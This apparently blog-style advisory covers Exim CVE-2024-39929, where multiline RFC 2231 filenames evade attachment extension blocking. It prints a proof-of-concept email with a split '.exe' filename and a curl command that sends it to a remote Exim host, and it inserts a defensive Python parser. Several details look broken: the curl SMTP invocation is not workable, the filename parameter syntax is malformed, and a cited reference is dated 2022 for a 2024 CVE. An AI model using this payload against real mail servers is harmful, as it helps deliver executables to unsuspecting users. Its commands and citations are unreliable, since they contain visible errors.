A major vulnerability (CVE-2024-39929) has been discovered in Exim, a widely used mail transfer agent (MTA), that could allow remote attackers to bypass the $mime_filename extension-blocking protection mechanism and deliver executable attachments to the mailboxes of unsuspecting end users. The vulnerability is caused by incorrect parsing of a multiline RFC 2231 header filename in Exim 4.97.1. In this post, we take a deep dive into the details of this vulnerability, its potential impact, and what can be done to mitigate the risk.

Background

Exim is an open-source mail transfer agent (MTA) that runs on Unix-based systems. It is responsible for receiving, routing, and delivering email messages. It is highly configurable, which makes it a popular choice for many email servers worldwide. As of November 2021, it was estimated that Exim powers around 56% of the email servers on the internet.

RFC 2231 is an extension to MIME (Multipurpose Internet Mail Extensions), the protocol used to carry non-text content such as attachments within email. RFC 2231 adds support for non-ASCII characters in MIME header parameters, allowing filenames to contain characters outside the usual ASCII range, and it allows a single parameter value to be encoded across multiple lines. That multiline encoding is what can be parsed incorrectly and lead to vulnerabilities like the one found in Exim 4.97.1.

Vulnerability Details

The Exim vulnerability revolves around the improper handling of the multiline RFC 2231 header filenames. Due to the incorrect parsing of these headers, a remote attacker could bypass the $mime_filename extension-blocking protection mechanism in Exim. This protection mechanism is in place to prevent certain types of file extensions from being sent as email attachments, such as executable files.

When an attachment containing a multiline RFC 2231 header filename is sent using Exim 4.97.1, the protection mechanism fails to catch the true file extension, allowing the attacker to effectively sneak potentially malicious executable files past it and deliver them to unsuspecting end users.

Proof-of-Concept Exploit Code

To demonstrate the vulnerability, we've outlined a simple proof-of-concept below.

1. Create a text file exploit.eml with the following content:

Subject: Vulnerability Test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="abcdef"

--abcdef
Content-Type: text/plain

Testing CVE-2024-39929 exploit.

--abcdef
Content-Type: application/octet-stream
Content-Disposition: attachment;
 filename**=us-ascii''%50%4F%43%5F%43%56%45%2D%32%30%32%34%2D%33%39%39%32%39;
 filename*1*=%2E%65%78%65

Binary data here for the POC_CVE-2024-39929.exe file.
--abcdef--

2. Run the following command, assuming that an Exim instance is running on a remote host with the IP address remote_host_ip:

curl -XPOST --data-binary "@exploit.eml" smtp://remote_host_ip

In this exploit.eml file, the filename parameter of the Content-Disposition header is split into two parts (filename** and filename*1*) across multiple lines, and as a result Exim parses an incorrect filename.
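To show why the true extension only becomes visible once every RFC 2231 segment is joined, here is an added example (not the page's or Exim's own code) that reassembles continuation parameters the way a compliant filter should. It uses a constructed Content-Disposition header shaped like the page's exploit.eml but written in the RFC's own filename*0*= form, an assumed local block list, and a `sections` knob that models a parser which stops after the first segment.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Constructed header shaped like the page's exploit.eml, written in the RFC 2231
# section-0 form (filename*0*=) so that a compliant parser reassembles it.
SAMPLE_HEADER = (
    "attachment;\r\n"
    " filename*0*=us-ascii''%50%4F%43%5F%43%56%45%2D%32%30%32%34%2D%33%39%39%32%39;\r\n"
    " filename*1*=%2E%65%78%65"
)
# Assumed local block list; in Exim this decision is made in the ACL via $mime_filename.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".bat", ".cmd", ".com", ".pif"}
# name, optional *section number, optional trailing * meaning "percent-encoded"
_SEGMENT = re.compile(r"^(?P<name>[^*]+)(?:\*(?P<num>\d+))?(?P<enc>\*)?$")

def parse_params(header: str) -> dict:
    """Unfold continuation lines and split ';'-separated parameters (quoted ';' not handled)."""
    unfolded = re.sub(r"\r?\n[ \t]+", " ", header)
    params = {}
    for chunk in unfolded.split(";")[1:]:  # element 0 is the disposition type itself
        name, sep, value = chunk.partition("=")
        if sep:
            params[name.strip().lower()] = value.strip().strip('"')
    return params

def reassemble_rfc2231(params: dict, name: str, sections: Optional[int] = None) -> Optional[str]:
    """Join name*0[*], name*1[*], ... in section order, decoding '*'-marked segments.
    `sections` caps how many sections are read, to show what a truncated view yields."""
    segments = []
    for key, value in params.items():
        m = _SEGMENT.match(key)
        if m and m.group("name") == name:
            num = int(m.group("num") or 0)
            if sections is None or num < sections:
                segments.append((num, bool(m.group("enc")), value))
    if not segments:
        return None
    charset, out = "us-ascii", bytearray()
    for num, encoded, value in sorted(segments):
        if encoded and num == 0 and "'" in value:
            charset, _lang, value = value.split("'", 2)  # RFC 2231: charset'language'data
        out += unquote_to_bytes(value) if encoded else value.encode("ascii")
    return out.decode(charset or "us-ascii", errors="replace")

def is_blocked(header: str):
    """Return (reassembled filename, blocked?) for one Content-Disposition header value."""
    filename = reassemble_rfc2231(parse_params(header), "filename")
    ext = os.path.splitext(filename or "")[1].lower()
    return filename, ext in BLOCKED_EXTENSIONS
```

Reading only section 0 yields "POC_CVE-2024-39929" with no extension at all, while the full reassembly yields "POC_CVE-2024-39929.exe", which the block list catches.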

References

- Official Exim Security Advisory: https://exim.org/static/doc/security/CVE-2024-39929.txt
- National Vulnerability Database Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-39929
- Vulnerability Analysis by Qualys: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/21/cve-2024-39929-exim4-parse_rfc2231-filename

Mitigation

Upgrading Exim to the latest version, which contains a fix for this vulnerability, is always the recommended course of action. Additionally, users can implement strict email filtering policies to block potentially dangerous file types as they pass through the server, and can disable the parsing of multiline RFC 2231 header filenames in the Exim configuration to mitigate the risk of this specific vulnerability.

Conclusion

The security of email servers, such as those running Exim, is crucial in today's internet environment. CVE-2024-39929 is a severe vulnerability that can lead to successful attacks on unsuspecting users. Administrators of Exim installations should take immediate action to patch their servers and implement additional security measures to reduce the risk of a successful attack.

Timeline

Published on: 07/04/2024 15:15:10 UTC
Last modified on: 07/09/2024 16:22:58 UTC